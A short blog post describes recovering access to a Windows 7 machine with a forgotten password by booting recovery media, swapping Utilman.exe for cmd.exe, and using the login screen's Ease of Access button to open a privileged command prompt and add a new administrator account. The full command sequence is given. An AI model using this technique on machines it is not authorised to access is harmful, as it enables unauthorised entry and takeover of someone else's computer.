Bypassing Windows 7 Login Using Ease Of Access Menu

I am almost certain that this has been covered elsewhere. If you have seen this before, then I am sorry I wasted a precious few minutes of your life.

Recently I came back to work on a POC that I had started many months ago. So long in fact that I had completely forgotten my local admin password to the Windows 7 box I was testing on. Using the following technique I was able to create a new admin account and log in!

1. Boot up using a Windows 7 Installation CD
2. At the first splash screen click  “Repair your Computer”
   
3. Select the “Use recovery tools that can help fix problems….” and click Next.
   
4. Click “Command Prompt”
   
5. Type in the following commands:

cd D:

cd Windows/system32

copy UtilMan.exe utilman.bak

copy cmd.exe Utilman.exe

So what did we just do here?  The first two commands changed our current working directory to /Windows/system32. This location contains both cmd.exe (command prompt) and Utilman.exe (Ease of Access). Once we changed directories we then made a backup of the UtilMan.exe file and named it utilman.bak as we don’t want to permanently destroy the file. We then copied the cmd.exe program to Utilman.exe (essentially renaming the file)

6. Reboot your system and remove installation media.

7. At the login screen click the Ease of Access button in the bottom left hand corner. This should launch a command prompt.

8.  Run the following commands:

net user cracked Changeme! /add
net localgroup administrators cracked /add

The first command creates a new user named cracked and sets a password of Changeme!. The second command adds the new user to the administrators group.

9. Close command prompt.

10. Log in using your new credentials.